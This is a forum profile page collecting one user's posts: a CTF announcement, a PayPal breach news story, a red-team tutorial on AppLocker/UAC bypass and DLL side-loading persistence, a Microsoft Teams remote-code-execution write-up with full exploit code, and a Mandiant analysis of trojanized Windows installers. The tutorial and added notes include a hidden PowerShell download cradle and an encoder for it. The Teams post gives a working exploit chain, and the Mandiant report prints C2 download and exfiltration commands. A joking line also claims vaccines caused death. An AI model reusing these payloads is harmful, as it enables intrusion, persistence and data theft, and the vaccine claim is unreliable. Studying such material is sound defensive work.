Everything posted by Nytro

  1. RSTCon #3 - CTF

    The CTF platform is available and registration is open: https://ctf.rstcon.com/ Contest prizes: 1st place 4000 RON, 2nd place 2000 RON, 3rd place 1000 RON, best write-up 500 RON. The prizes are funded by donations from community members; anyone who can help with a donation is asked to contact us at contact@rstcon.com, and with more donations the prize pool may grow. Likewise, if you would like to support us by creating CTF exercises, regardless of difficulty or topic, we are waiting for an email at contact@rstcon.com. For discussions about the CTF we will use the #ctf channel on Discord. The contest results will be presented at 16:00 on Discord. Full details: https://rstcon.com/ctf/ More details to follow.
  2. RSTCon is a free online conference, held in Romanian, brought to life by the RST community. The conference will take place on April 27-28, 2023 from 10:00 to 17:00, and the CTF contest will run from April 29, 2023 at 10:00 until April 30, 2023 at 17:00. The conference will be held on the Zoom platform. Registration and access to the event are available at the following addresses: RSTCon #3 – April 27 – Day I: https://us02web.zoom.us/webinar/register/WN_xKDZ0iklTjWeWcaH34VNsQ RSTCon #3 – April 28 – Day II: https://us02web.zoom.us/webinar/register/WN_0Y7IwXCjR4-U1Fcvyj4R9w Please note that the Zoom events are different for the two days. LinkedIn: https://www.linkedin.com/events/rstcon-37035364565479473152/about/ Full details at https://rstcon.com/ More information to follow.
  3. I have 3 vaccine doses and because of them I have died about 2 times.
  4. Nice, in theory you could have escalated it to RCE, but they have probably kept adding mitigations. Let us know how much they pay for it.
  5. Fun stuff

    https://9gag.com/gag/a4oEMp1
  6. PayPal accounts breached in large-scale credential stuffing attack By Bill Toulas January 19, 2023 PayPal is sending out data breach notifications to thousands of users who had their accounts accessed through credential stuffing attacks that exposed some personal data. Credential stuffing is an attack in which hackers attempt to access an account by trying out username and password pairs sourced from data leaks on various websites. This type of attack relies on an automated approach with bots running lists of credentials to "stuff" into login portals for various services. Credential stuffing targets users that employ the same password for multiple online accounts, which is known as "password recycling." Close to 35,000 users impacted PayPal explains that the credential stuffing attack occurred between December 6 and December 8, 2022. The company detected and mitigated it at the time but also started an internal investigation to find out how the hackers obtained access to the accounts. By December 20, 2022, PayPal concluded its investigation, confirming that unauthorized third parties logged into the accounts with valid credentials. The electronic payments platform claims that this was not due to a breach on its systems and has no evidence that the user credentials were obtained directly from them. According to the data breach reporting from PayPal, 34,942 of its users have been impacted by the incident. During the two days, hackers had access to account holders' full names, dates of birth, postal addresses, social security numbers, and individual tax identification numbers. Transaction histories, connected credit or debit card details, and PayPal invoicing data are also accessible on PayPal accounts. PayPal says it took timely action to limit the intruders' access to the platform and reset the passwords of accounts confirmed to have been breached. Also, the notification claims that the attackers either did not attempt or did not manage to perform any transactions from the breached PayPal accounts. "We have no information suggesting that any of your personal information was misused as a result of this incident, or that there are any unauthorized transactions on your account," reads PayPal's notification to impacted users. "We reset the passwords of the affected PayPal accounts and implemented enhanced security controls that will require you to establish a new password the next time you log in to your account" - PayPal Impacted users will receive a free-of-charge two-year identity monitoring service from Equifax. The company strongly recommends that recipients of the notices change the passwords for other online accounts using a unique and long string. Typically, a good password is at least 12 characters long and includes alphanumeric characters and symbols. Moreover, PayPal advises users to activate two-factor authentication (2FA) protection from the 'Account Settings' menu, which can prevent an unauthorized party from accessing an account, even if they have a valid username and password. Sursa: https://www.bleepingcomputer.com/news/security/paypal-accounts-breached-in-large-scale-credential-stuffing-attack/
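    Note: as a quick illustration of the password advice above, here is a minimal Python sketch (standard library only) that generates a random password mixing letters, digits, and symbols; the 16-character length is an arbitrary choice above the article's 12-character minimum.

    import secrets
    import string

    # Random password per the article's guidance: 12+ characters,
    # mixing letters, digits, and symbols. 16 is an arbitrary choice.
    alphabet = string.ascii_letters + string.digits + string.punctuation
    password = "".join(secrets.choice(alphabet) for _ in range(16))
    print(password)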
  7. assume-breach Jan 20 Home Grown Red Team: Bypassing Applocker, UAC, and Getting Administrative Persistence Welcome back! In my previous post, I showed how we can bypass default Applocker rules using LNK files to get a Havoc beacon. In this installment, we’re going to bypass UAC and gain administrative persistence on a target without dropping EXEs to disk. Pretty cool, right? Getting Started If you haven’t read my previous post, you can find it here: Bypassing Applocker Using LNK Files. That post is going to show you how to set up your Powershell scripts, LNK file and so forth for initial access to the target. Since we still have access to our target, we’re going to start where we ended in our last article. Here’s the scenario: We have an administrative beacon in medium integrity through Havoc C2. You’ll notice that the process is Powershell. If we had used process injection in our shellcode dropper, we would have migrated to a different process like Explorer.exe or ApplicationFrameHost.exe (just something to think about). Running a “whoami” we see that our user, david, is part of the administrators group. In order for our persistence method to work, we need local admin. The reason being that we need access to “C:\Windows\” and this isn’t accessible to domain users or administrators unless we are in a high integrity beacon/process. So since this user is an admin, we can perform a UAC bypass. For this task, I prefer to use my own tool, HighBorn. HighBorn utilizes the Windows mock directory vulnerability to side load a DLL and execute it in high integrity. Using A UAC Bypass To Perform Administrative Actions A typical UAC Bypass is performed to get a high integrity beacon back to a C2. However, we can use HighBorn to perform administrative tasks on execution instead of getting a high integrity beacon. Let’s discuss the typical UAC Bypass to get a beacon back to Havoc. This is the usual workflow: Target downloads malicious EXE . 2. We run HighBorn in memory using inline-execute. 3. HighBorn performs the UAC Bypass and calls the EXE in high integrity. 4. We get a high integrity beacon. Since we are bypassing Applocker protections, we don’t have a dropper on disk. Remember, our beacon is running through a Powershell process. The UAC Bypass performs administrative code execution so we can tailor this to our needs. Since our need for this POC is persistence, we can change our execution from calling a malicious EXE to downloading a malicious DLL. DLL Side Loading For Persistence I’ve seen a few posts on this, mainly on LinkedIn, but there is a pretty popular DLL side loading vulnerability in Windows File Explorer. If you craft a malicious DLL and name it cscapi.dll, you can place it in C:\Windows\ and it will get executed when the user logs in. The caveat to this is that you must have local admin privileges to gain access to C:\Windows\. So let’s begin by creating a malicious DLL. Creating The Malicious DLL To create a malicious DLL, I prefer to use my own tool, Harriet. We choose option 2 to create our DLL. We then choose option 1 (the only option for now) and then we input all of our values. I chose to inject into Explorer.exe (you might want to change this process if you’re on a real pentest) and I named my DLL appropriately for the exploit. Modifying HighBorn.cs For Administrative Actions Now we need to craft a command to call out to cscapi.dll and download it into C:\Windows\. This is where HighBorn comes in. I navigate to the HighBorn folder and edit the HighBorn.c file. 
As you can see from the screenshot, this is a very simple DLL. We can use an easy Powershell command to download our cscapi.dll file into the Windows folder. powershell -Sta -Nop -Window Hidden iwr -Uri 'http://IP:PORT/cscapi.dll' -Outfile 'C:\Windows\cscapi.dll' However, if we try to compile this, we get escape sequence errors. Let's encode our command into Base64 using Powershell. $str = "powershell -Sta -Nop -Window Hidden iwr -Uri 'http://IP:PORT/cscapi.dll' -Outfile 'C:\Windows\cscapi.dll'" [System.Convert]::ToBase64String([System.Text.Encoding]::Unicode.GetBytes($str)) Now we should have a good Base64 string. Let's add it to the HighBorn.c file. We then compile it per the command in the ReadMe.md file in the HighBorn folder. x86_64-w64-mingw32-gcc -shared -o secur32.dll HighBorn.c -lcomctl32 -Wl,--subsystem,windows Now we have a secur32.dll file. In the HighBorn.cs file, we modify the exploit to put our IP and port to pull secur32.dll. Then we can compile HighBorn.exe with this command. mcs HighBorn.cs /out:HighBorn.exe We host secur32.dll and run our command in Havoc. On our Python server, we see it pull secur32.dll and then it pulls our cscapi.dll file! Moving to our Windows folder on the target, we see that it has our DLL in place. Now remember, our cscapi.dll is a malicious DLL that will inject shellcode into Explorer.exe on login. Let's reboot the target and see if we get a shell back. If all goes well, we should get a beacon in the Explorer.exe process on Havoc. And as user david logs in, we have our beacon! Pretty cool persistence technique! The biggest con to this technique is that you need admin privileges. However, if you can crack an admin password you can perform this technique on any user's system for persistence on multiple workstations in the environment without having to drop an EXE to disk. Hopefully you found this article helpful or at least interesting. If you like my content you can follow me on here or on Twitter @assume_breach Sursa: https://assume-breach.medium.com/home-grown-red-team-bypassing-applocker-uac-and-getting-administrative-persistence-88b85c81343e
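    Note: the Base64 string above can also be produced outside PowerShell. The Python sketch below mirrors [System.Text.Encoding]::Unicode.GetBytes (UTF-16LE) followed by ToBase64String; IP:PORT stays a placeholder for your own host, exactly as in the article.

    import base64

    # Hypothetical download cradle from the article; IP:PORT is a placeholder.
    cmd = ("powershell -Sta -Nop -Window Hidden "
           "iwr -Uri 'http://IP:PORT/cscapi.dll' -Outfile 'C:\\Windows\\cscapi.dll'")

    # PowerShell's "Unicode" encoding is UTF-16LE, so encode that way before Base64.
    encoded = base64.b64encode(cmd.encode("utf-16-le")).decode()
    print(encoded)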
  8. 2022 Microsoft Teams RCE Jan 16, 2023 jinmo123 of Theori (@jinmo123) and I (@adm1nkyj1) participated in Pwn2Own 2022 Vancouver. We failed because of a time allocation issue, but our bug and exploit were really cool, so we decided to share them in a blog post! Executive Summary The deeplink handler for /l/task/:appId in Microsoft Teams can load an arbitrary url in a webview/iframe. An attacker can leverage this with Teams' RPC functionality to get code execution outside the sandbox. 1. URL allowlist bypass using url encoding URL Route example ... k(p.states.appDeepLinkTaskModule, { url: "l/task/:appId?url&height&width&title&fallbackURL&card&completionBotId" }), k(p.states.appSfbFreQuickStartVideo, { url: "sfbfrequickstartvideo" }), k(p.states.appDeepLinkMeetingCreate, { url: "l/meeting/new?meetingType&groupId&tenantId&deeplinkId&attendees&subject&content&startTime&endTime&nobyoe&qsdisclaimer" }), k(p.states.appDeepLinkMeetingDetails, { url: "l/meeting/:tenantId/:organizerId/:threadId/:messageId?deeplinkId&nobyoe&qsdisclaimer" }), k(p.states.appDeepLinkMeetingDetailsEventId, { url: "l/meeting/details?eventId&deeplinkId" }), k(p.states.appDeepLinkVirtualEventCreate, { url: "l/virtualevent/new?eventType" }), k(p.states.appDeepLinkVirtualEventDetails, { url: "l/virtualevent/:eventId" }), ... In Microsoft Teams, there is a url route handler for /l/task/:appId which accepts url as a parameter. This allows a chat bot created by a Teams application to send a link to the user, which should be in the url allowlist. The allowlist is constructed from various fields of the app definition: a = angular.isDefined(e.validDomains) ? _.clone(e.validDomains) : []; return e.galleryTabs && a.push.apply(a, _.map(e.galleryTabs, function (e) { return i.getValidDomainFromUrl(e.configurationUrl) })), e.staticTabs && a.push.apply(a, _.map(e.staticTabs, function (e) { return i.getValidDomainFromUrl(e.contentUrl) })), e.connectors && a.push.apply(a, _.map(e.connectors, function (e) { return i.utilityService.parseUrl(e.configurationUrl).host These domains (e.g. www.office.com, www.github.com) are converted into regular expressions, and are used to validate the url: ... t.prototype.isUrlInDomainList = function(e, t, n) { void 0 === n && (n = !1); for (var i = n ? e : this.parseUrl(e).href, s = 0; s < t.length; s++) { for (var a = "", r = t[s].split("."), o = 0; o < r.length; o++) a += (o > 0 ? "[.]" : "") + r[o].replace("*", "[^/^.]+"); var c = new RegExp("^https://" + a + "((/|\\?).*)?$","i"); if (e.match(c) || i.match(c)) return !0 } return !1 } ... Regardless of the third parameter n, if the original url matches the given regular expression, this check is passed. After checking the url, the parsed form (parseUrl) is instead passed to the webview. e.prototype.setContainerUrl = function(e) { var t = this; this.sdkWindowMessageHandler && (this.sdkWindowMessageHandler.destroy(), this.sdkWindowMessageHandler = null); var n = this.utilityService.parseUrl(e); this.$q.when(this.htmlSanitizer.sanitizeUrl(n.href, ["https"])).then(function(e) { t.frameSrc = e }) } This is problematic because parseUrl of utilityService url-decodes the url; the check is done on the original, url-encoded url. In particular, when an allowlisted domain contains a wildcard, e.g. *.office.com, the generated regular expression is /^https://[^/^.]+[.]office[.]com((/|\?).*)?$/i. The wildcard becomes [^/^.]+, but if the given url is https://attacker.com%23.office.com, the check is passed.
However, after decoding the url, this becomes https://attacker.com#.office.com, which loads attacker.com instead. Microsoft Planner app (appId: 1ded03cb-ece5-4e7c-9f73-61c375528078) has a domain with wildcard in its validDomains field: { "manifestVersion": "1.7", "version": "0.0.19", "categories": [ "Microsoft", "Productivity", "ProjectManagement" ], "disabledScopes": [ "PrivateChannel" ], "developerName": "Microsoft Corporation", "developerUrl": "https://tasks.office.com", "privacyUrl": "https://privacy.microsoft.com/privacystatement", "termsOfUseUrl": "https://www.microsoft.com/servicesagreement", "validDomains": [ "tasks.teams.microsoft.com", "retailservices.teams.microsoft.com", "retailservices-ppe.teams.microsoft.com", "tasks.office.com", "*.office.com" ], ... } As a result, this bug allows the attacker to load an arbitrary location into a webview. PoC: https://teams.live.com/_#/l/task/1ded03cb-ece5-4e7c-9f73-61c375528078?url=https://attacker.com%23.office.com/&height=100&width=100&title=hey&fallbackURL=https://aka.ms/hey&completionBotId=1&fqdn=teams.live.com 2. pluginHost allows dangerous RPC calls from any webview Since contextIsolation is not enabled on the webview, attacker can leverage prototype pollution to invoke arbitrary electron IPC calls to processes (see Appendix section). Given this primitive, attacker can invoke 'calling:teams:ipc:initPluginHost' IPC call of main process, which gives the id of the pluginHost window. pluginHost exposes dangerous RPC calls to any webview e.g. returning a member of ‘registered objects’, calling them, and importing some allowlisted modules. lib/pluginhost/preload.js: // n, o is controllable P(c.remoteServerMemberGet, (e, t, n, o) => { const i = s.objectsRegistry.get(n); if (null == i) throw new Error( `Cannot get property '${o}' on missing remote object ${n}` ); return A(e, t, () => i[o]); }), // n, o, i is controllable P(c.remoteServerMemberCall, (e, t, n, o, i) => { i = v(e, t, i); const r = s.objectsRegistry.get(n); if (null == r) throw new Error( `Cannot call function '${o}' on missing remote object ${n}` ); return A(e, t, () => r[o](...i)); }), Attacker can get the constructor of any objects, and the constructor of the constructor (Function) to compile arbitrary JavaScript code, and call the compiled function. [_,pluginHost]=ipc.sendSync('calling:teams:ipc:initPluginHost', []); msg=ipc.sendToRendererSync(pluginHost, 'ELECTRON_REMOTE_SERVER_MEMBER_GET', [{hey: 1}, 1, 'constructor', []], '')[0].id msg=ipc.sendToRendererSync(pluginHost, 'ELECTRON_REMOTE_SERVER_MEMBER_CALL', [{hey: 1}, msg, 'constructor', [{type: 'value', value: 'alert()'}]], '')[0].id require() is not exposed to the script itself, but the attacker-controlled script can overwrite prototype of String, which is useful in this code: function loadSlimCore(slimcoreLibPath) { let slimcore; if (utility.isWebpackRuntime()) { const slimcoreLibPathWebpack = slimcoreLibPath.replace(/\\/g, "\\\\"); slimcore = eval(`require('${slimcoreLibPathWebpack}')`); ... } ... function requireEx(e, t) { ... const { slimCoreLibPath: n, error: o } = electron_1.ipcRenderer.sendSync( constants.events.calling.getSlimCoreLibInfo ); if (o) throw new Error(o); if (t === n) return loadSlimCore(n); // n === 'slimcore' throw new Error("Invalid module: " + t); } // y === requireEx P(c.remoteServerRequire, (e, t, n) => A(e, t, () => y(e, n))), If the attacker calls remoteServerRequire with 'slimcore' as an argument, the pluginHost evaluates string returned by String.prototype.replace. 
Therefore, the following code can invoke require with arbitrary arguments, and call methods in the module. msg=ipc.sendToRendererSync(pluginHost, 'ELECTRON_REMOTE_SERVER_MEMBER_CALL', [{hey: 1}, msg, 'constructor', [{type: 'value', value: 'var backup=String.prototype.replace; String.prototype.replace = ()=>"slimcore\');require(`child_process`).exec(`calc.exe`);(\'";'}]], '')[0].id ipc.sendToRendererSync(pluginHost, 'ELECTRON_REMOTE_SERVER_FUNCTION_CALL', [{hey: 1}, msg, []], '') ipc.sendToRendererSync(pluginHost, 'ELECTRON_REMOTE_SERVER_REQUIRE', [{hey: 1}, 'slimcore'], '') By using child_process module, attacker can execute any program. Appendix A: Accessing any bundled modules when contextIsolation is not enabled between preload script and web pages Electron compiles and executes a script named sandbox_bundle.js in every sandboxed frame, and it registers a handler that shows security warnings if user wants. To enable the security warning, users can set ELECTRON_ENABLE_SECURITY_WARNINGS either in environment variables or window. lib/renderer/security-warnings.ts#L43-L46: if ((env && env.ELECTRON_ENABLE_SECURITY_WARNINGS) || (window && window.ELECTRON_ENABLE_SECURITY_WARNINGS)) { shouldLog = true; } This is called on ‘load’ event of the window: export function securityWarnings (nodeIntegration: boolean) { const loadHandler = async function () { if (shouldLogSecurityWarnings()) { const webPreferences = await getWebPreferences(); logSecurityWarnings(webPreferences, nodeIntegration); } }; window.addEventListener('load', loadHandler, { once: true }); } security-warnings.ts is also bundled to sandbox_bundle.js using webpack. There is an import of webFrame, which lazily loads the “./lib/renderer/api/web-frame.ts”. import { webFrame } from 'electron'; ... const isUnsafeEvalEnabled = () => { return webFrame._isEvalAllowed(); }; // this is called by warnAboutInsecureCSP + logSecurityWarnings This is done by electron.ts: import { defineProperties } from '@electron/internal/common/define-properties'; import { moduleList } from '@electron/internal/sandboxed_renderer/api/module-list'; module.exports = {}; defineProperties(module.exports, moduleList); In define-properties.ts, it defines getter for all modules in moduleList; loader is invoked when a module e.g. webFrame is accessed. const handleESModule = (loader: ElectronInternal.ModuleLoader) => () => { const value = loader(); if (value.__esModule && value.default) return value.default; return value; }; // Attaches properties to |targetExports|. export function defineProperties (targetExports: Object, moduleList: ElectronInternal.ModuleEntry[]) { const descriptors: PropertyDescriptorMap = {}; for (const module of moduleList) { descriptors[module.name] = { enumerable: !module.private, get: handleESModule(module.loader) }; } return Object.defineProperties(targetExports, descriptors); } The loader for webFrame is defined in the moduleList: export const moduleList: ElectronInternal.ModuleEntry[] = [ { ... { name: 'webFrame', loader: () => require('@electron/internal/renderer/api/web-frame') }, Which is compiled as: }, { name: "webFrame", loader: ()=>r(/*! @electron/internal/renderer/api/web-frame */ "./lib/renderer/api/web-frame.ts") }, { The function r above is __webpack_require__, which actually loads the module if not loaded yet. function __webpack_require__(r) { if (t[r]) return t[r].exports; Here, t is the list of cached modules. If the module is not loaded by any code, t[r] is undefined. 
Also, t.__proto__ points Object.prototype, so attacker can install getter for the module path to get the whole list of cached modules. const KEY = './lib/renderer/api/web-frame.ts'; let modules; Object.prototype.__defineGetter__(KEY, function () { console.log(this); modules = this; delete Object.prototype[KEY]; main(); }) This enables attacker to get the @electron/internal/renderer/api/ipc-renderer module to send any IPCs to any processes. var ipc = modules['./lib/renderer/api/ipc-renderer.ts'].exports.default; [_, pluginHost] = ipc.sendSync('calling:teams:ipc:initPluginHost', []); We utilized this to send IPC to pluginHost (see Section 2), and execute a program outside the sandbox. Exploit Client : https://teams.live.com/l/task/1ded03cb-ece5-4e7c-9f73-61c375528078?url=https://0e1%2Ekr\cd2c4753c4cb873c7be66e3ffdeae71f71ce33482e9921bab01dc3670a3b4f95\%23.office.com/&height=100&width=100&title=hey&fallbackURL=https://aka.ms/hey&completionBotId=&fqdn=teams.live.com Server : <script> const KEY = './lib/renderer/api/web-frame.ts'; let modules; Object.prototype.__defineGetter__(KEY, function () { console.log(this); modules = this; delete Object.prototype[KEY]; main(); }) window.ELECTRON_ENABLE_SECURITY_WARNINGS = true; function main() { var ipc = modules['./lib/renderer/api/ipc-renderer.ts'].exports.default; [_, pluginHost] = ipc.sendSync('calling:teams:ipc:initPluginHost', []); msg = ipc.sendToRendererSync(pluginHost, 'ELECTRON_REMOTE_SERVER_REQUIRE', [{ hey: 1 }, 'slimcore'], '')[0] msg = ipc.sendToRendererSync(pluginHost, 'ELECTRON_REMOTE_SERVER_MEMBER_GET', [{ hey: 1 }, msg.id, 'constructor', []], '')[0] msg = ipc.sendToRendererSync(pluginHost, 'ELECTRON_REMOTE_SERVER_MEMBER_CALL', [{ hey: 1 }, msg.id, 'constructor', [{ type: 'value', value: 'var backup=String.prototype.replace; String.prototype.replace = ()=>"slimcore\');require(`child_process`).exec(`calc.exe`);(\'";' }]], '')[0] ipc.sendToRendererSync(pluginHost, 'ELECTRON_REMOTE_SERVER_FUNCTION_CALL', [{ hey: 1 }, msg.id, []], '') msg = ipc.sendToRendererSync(pluginHost, 'ELECTRON_REMOTE_SERVER_REQUIRE', [{ hey: 1 }, 'slimcore'], '') } </script> Sursa: https://blog.pksecurity.io/2023/01/16/2022-microsoft-teams-rce.html
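    Note: circling back to the allowlist bypass in section 1, here is a small Python re-implementation of the isUrlInDomainList logic shown above (my own sketch, not Teams code). It uses a hypothetical URL in which the attacker host's own dot is also percent-encoded, so the encoded string slips past the generated regular expression while the decoded form points at a different host.

    import re
    from urllib.parse import unquote, urlsplit

    def allowlist_regex(domain: str) -> re.Pattern:
        # Mirrors the JS above: "." becomes "[.]", "*" becomes "[^/^.]+"
        parts = [p.replace("*", "[^/^.]+") for p in domain.split(".")]
        return re.compile(r"^https://" + "[.]".join(parts) + r"((/|\?).*)?$", re.IGNORECASE)

    allowed = allowlist_regex("*.office.com")

    # Hypothetical attacker URL: the dot in the attacker host is percent-encoded,
    # so the raw string contains no "." or "/" before ".office.com".
    url = "https://attacker%2Eexample%23.office.com/"

    print("passes allowlist check:", bool(allowed.match(url)))   # True
    decoded = unquote(url)                                       # https://attacker.example#.office.com/
    print("decoded url:", decoded)
    print("host actually loaded:", urlsplit(decoded).netloc)     # attacker.example

    The same idea scales to the real PoC above, where %2E hides the dots of the attacker domain and %23 turns the allowlisted suffix into a fragment after decoding.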
  9. Trojanized Windows 10 Operating System Installers Targeted Ukrainian Government MANDIANT INTELLIGENCE DEC 15, 2022 16 MIN READ Executive Summary Mandiant identified an operation focused on the Ukrainian government via trojanized Windows 10 Operating System installers. These were distributed via torrent sites in a supply chain attack. Threat activity tracked as UNC4166 likely trojanized and distributed malicious Windows Operating system installers which drop malware that conducts reconnaissance and deploys additional capability on some victims to conduct data theft. The trojanized files use the Ukrainian language pack and are designed to target Ukrainian users. Following compromise targets selected for follow on activity included multiple Ukrainian government organizations. At this time, Mandiant does not have enough information to attribute UNC4166 to a sponsor or previously tracked group. However, UNC4166’s targets overlap with organizations targeted by GRU related clusters with wipers at the outset of the war. Threat Detail Mandiant uncovered a socially engineered supply chain operation focused on Ukrainian government entities that leveraged trojanized ISO files masquerading as legitimate Windows 10 Operating System installers. The trojanized ISOs were hosted on Ukrainian- and Russian-language torrent file sharing sites. Upon installation of the compromised software, the malware gathers information on the compromised system and exfiltrates it. At a subset of victims, additional tools are deployed to enable further intelligence gathering. In some instances, we discovered additional payloads that were likely deployed following initial reconnaissance including the STOWAWAY, BEACON, and SPAREPART backdoors. One trojanized ISO “Win10_21H2_Ukrainian_x64.iso” (MD5: b7a0cd867ae0cbaf0f3f874b26d3f4a4) uses the Ukrainian Language pack and could be downloaded from “https://toloka[.]to/t657016#1873175.” The Toloka site is focused on a Ukrainian audience and the image uses the Ukrainian language (Figure 1). The same ISO was observed being hosted on a Russian torrent tracker (https://rutracker[.]net/forum/viewtopic.php?t=6271208) using the same image. The ISO contained malicious scheduled tasks that were altered and identified on multiple systems at three different Ukrainian organizations beaconing to .onion TOR domains beginning around mid-July 2022. Figure 1: Win10_21H2_Ukrainian_x64.iso (MD5: b7a0cd867ae0cbaf0f3f874b26d3f4a4) Attribution and Targeting Mandiant is tracking this cluster of threat activity as UNC4166. We believe that the operation was intended to target Ukrainian entities, due to the language pack used and the website used to distribute it. The use of trojanized ISOs is novel in espionage operations and included anti-detection capabilities indicates that the actors behind this activity are security conscious and patient, as the operation would have required a significant time and resources to develop and wait for the ISO to be installed on a network of interest. Mandiant has not uncovered links to previously tracked activity, but believes the actor behind this operation has a mandate to steal information from the Ukrainian government. The organizations where UNC4166 conducted follow on interactions included organizations that were historically victims of disruptive wiper attacks that we associate with APT28 since the outbreak of the invasion. 
This ISO was originally hosted on a Ukrainian torrent tracker called toloka.to by an account “Isomaker” which was created on the May 11, 2022. The ISO was configured to disable the typical security telemetry a Windows computer would send to Microsoft and block automatic updates and license verification. There was no indication of a financial motivation for the intrusions, either through the theft of monetizable information or the deployment of ransomware or cryptominers. Outlook and Implications Supply chain operations can be leveraged for broad access, as in the case of NotPetya, or the ability to discreetly select high value targets of interest, as in the SolarWinds incident. These operations represent a clear opportunity for operators to get to hard targets and carry out major disruptive attack which may not be contained to conflict zone. For more research from Google Cloud on securing the supply chain, see this Perspectives on Security report. Technical Annex Mandiant identified several devices within Ukrainian Government networks which contained malicious scheduled tasks that communicated to a TOR website from around July 12th, 2022. These scheduled tasks act as a lightweight backdoor that retrieves tasking via HTTP requests to a given command and control (C2) server. The responses are then executed via PowerShell. From data collated by Mandiant, it appears that victims are selected by the threat actor for further tasking. In some instances, we discovered devices had additional payloads that we assess were deployed following initial reconnaissance of the users including the deployment of the STOWAWAY and BEACON backdoors. STOWAWAY is a publicly available backdoor and proxy. The project supports several types of communication like SSH, socks5. Backdoor component supports upload and download of files, remote shell and basic information gathering. BEACON is a backdoor written in C/C++ that is part of the Cobalt Strike framework. Supported backdoor commands include shell command execution, file transfer, file execution, and file management. BEACON can also capture keystrokes and screenshots as well as act as a proxy server. BEACON may also be tasked with harvesting system credentials, port scanning, and enumerating systems on a network. BEACON communicates with a C2 server via HTTP or DNS. The threat actor also began to deploy secondary toehold backdoors in the environment including SPAREPART, likely as a means of redundancy for the initial PowerShell bootstraps. SPAREPART is a lightweight backdoor written in C that uses the device’s UUID as a unique identifier for communications with the C2. Upon successful connection to a C2, SPAREPART will download the tasking and execute it through a newly created process. Details Infection Vector Mandiant identified multiple installations of a trojanized ISO, which masquerades as a legitimate Windows 10 installer using the Ukrainian Language pack with telemetry settings disabled. We assess that the threat actor distributed these installers publicly, and then used an embedded schedule task to determine whether the victim should have further payloads deployed. 
Win10_21H2_Ukrainian_x64.iso (MD5: b7a0cd867ae0cbaf0f3f874b26d3f4a4) Malicious trojanized Windows 10 installer Downloaded from https://toloka.to/t657016#1873175 Forensic analysis on the ISO identified the changes made by UNC4166 that enables the threat actor to perform additional triage of victim accounts: Modification of the GatherNetworkInfo and Consolidator Schedule Tasks The ISO contained altered GatherNetworkInfo and Consolidator schedule tasks, which added a secondary action that executed the PowerShell downloader action. Both scheduled tasks are legitimate components of Windows and execute the gatherNetworkInfo.vbs script or waqmcons.exe process. Figure 2: Legitimate GatherNetworkInfo task configuration The altered tasks both contained a secondary action that was responsible for executing a PowerShell command. This command makes use of the curl binary to download a command from the C2 server, then the command is executed through PowerShell. The C2 servers in both instances were addresses to TOR gateways. These gateways advertise as a mechanism for users to access TOR from the standard internet (onion.moe, onion.ws). These tasks act as the foothold access into compromised networks, allowing UNC4166 to conduct reconnaissance on the victim device to determine networks of value for follow on threat activity. Figure 3: Trojanized GatherNetworkInfo task configuration Based on forensic analysis of the ISO file, Mandiant identified that the compromised tasks were both edited as follows: C:\Windows\System32\Tasks\Microsoft\Windows\Customer Experience Improvement Program\Consolidator (MD5: ed7ab9c74aad08b938b320765b5c380d) Last edit date: 2022-05-11 12:58:55 Executes: powershell.exe (curl.exe -k https://ufowdauczwpa4enmzj2yyf7m4cbsjcaxxoyeebc2wdgzwnhvwhjf7iid.onion[.]moe -H ('h:'+(wmic csproduct get UUID))) C:\Windows\System32\Tasks\Microsoft\Windows\NetTrace\GatherNetworkInfo (MD5: 1433dd88edfc9e4b25df370c0d8612cf) Last edit date: 2022-05-11 12:58:12 Executes: powershell.exe curl.exe -k https://ufowdauczwpa4enmzj2yyf7m4cbsjcaxxoyeebc2wdgzwnhvwhjf7iid[.]onion.ws -H ('h:'+(wmic csproduct get UUID)) | powershell.exe Note: At the time of analysis, the onion[.]ws C2 server is redirecting requests to legitimate websites. Software Piracy Script The ISO contained an additional file not found in standard Windows distributions called SetupComplete.cmd. SetupComplete is a Windows batch script that is configured to be executed upon completion of the Windows installation but before the end user is able to use the device. The script appears to be an amalgamation of multiple public scripts including remove_MS_telemetry.cmd by DeltoidDelta and activate.cmd by Poudyalanil (originally wiredroid) with the addition of a command to disable OneDriveSetup which was not identified in either script. The script is responsible for disabling several legitimate Windows services and tasks, disabling Windows updates, blocking IP addresses and domains related to legitimate Microsoft services, disabling OneDrive and activating the Windows license. Forensic artifacts led Mandiant to identify three additional scripts that were historically on the image, we assess that over time the threat actor has made alterations to these files. 
SetupComplete.cmd (MD5: 84B54D2D022D3DF9340708B992BF6669) Batch script to disable legitimate services and activate Windows File currently hosted on ISO SetupComplete.cmd (MD5: 67C4B2C45D4C5FD71F6B86FA0C71BDD3) Batch script to disable legitimate services and activate Windows File recovered through forensic file carving SetupComplete.cmd (MD5: 5AF96E2E31A021C3311DFDA200184A3B) Batch script to disable legitimate services and activate Windows File recovered through forensic file carving Victim Identification Mandiant assesses that the threat actor performs initial triage of compromised devices, likely to determine whether the victims were of interest. This triage takes place using the trojanized schedule tasks. In some cases, the threat actor may deploy additional capability for data theft or new persistence backdoors, likely for redundancy in the cases of SPAREPART or to enable additional tradecraft with BEACON and STOWAWAY. The threat actor likely uses the device’s UUID as a unique identifier to track victims. This unique identifier is transferred as a header in all HTTP requests both to download tasking and upload stolen data/responses. The threat actor’s playbook appears to follow a distinct pattern: Execute a command Optionally, filter or expand the results Export the results to CSV using the Export-Csv command and write to the path sysinfo (%system32%\sysinfo) Optionally, compress the data into sysinfo.zip (%system32%\sysinfo.zip) Optionally, upload the data instantaneously to the C2 (in most cases this is a separate task that is executed at the next beacon). Mandiant identified the threat actor exfiltrate data containing system information data, directory listings including timestamps and device geo-location. A list of commands used can be found in the indicators section. Interestingly, we did uncover a command that didn’t fit the aforementioned pattern in at least one instance. This command was executed on at least one device where the threat actor had access for several weeks. curl.exe -k https://ufowdauczwpa4enmzj2yyf7m4cbsjcaxxoyeebc2wdgzwnhvwhjf7iid.onion[.]moe -H h:filefile-file-file-file-filefilefile –output temp.zip Although we were not able to discover evidence that temp.zip was executed or recover the file, we were able to identify the content of the file directly from the C2 during analysis. This command is likely an alternative mechanism for the threat actor to collect the system information for the current victim, although it’s unclear why they wouldn’t deploy the command directly.. chcp 65001; [console]::outputencoding = [system.text.encoding]::UTF8; Start-Process powershell -argument “Get-ComputerInfo | Export-Csv -path sysinfo -encoding UTF8” -wait -nonewwindow; curl.exe -H (‘h:’+(wmic csproduct get UUID)) –data-binary “@sysinfo” -k https://ufowdauczwpa4enmzj2yyf7m4cbsjcaxxoyeebc2wdgzwnhvwhjf7iid.onion[.]moe; rm sysinfo The download command is notable as the threat actor uses a hardcoded UUID (filefile-file-file-file-filefilefile), which we assess is likely a default value. It’s unclear why the threat actor performed this additional request in favor of downloading the command itself; we believe this may be used as a default command by the threat actors. Follow On Tasking If 